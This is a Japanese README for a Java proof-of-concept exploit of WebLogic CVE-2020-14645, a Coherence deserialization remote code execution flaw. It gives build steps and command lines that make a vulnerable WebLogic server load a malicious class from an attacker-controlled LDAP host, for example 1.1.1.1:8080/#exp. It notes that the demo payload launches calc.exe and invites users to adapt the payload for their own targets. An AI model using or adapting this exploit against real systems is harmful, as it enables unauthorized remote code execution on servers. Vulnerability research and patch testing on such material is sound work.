
WebLogic CVE-2020-14645 Coherence デシリアライゼーション RCE の Java PoC。LDAP 経由で悪意のあるクラスをホストし、脆弱な WebLogic サーバー上でリモートコード実行をトリガーします。
Maven 3
JDK 1.8
mvn package
具体的なテスト手順:
この脆弱性は Apache Dubbo の脆弱性と類似しているため、この脆弱性を参考にして 1-4 の手順を実装してください。
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# 例
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
本例で提供する POC を使用した場合、攻撃が成功するとテスト対象で calc.exe が実行されます。テスト対象の環境に応じて POC を適宜変更してください。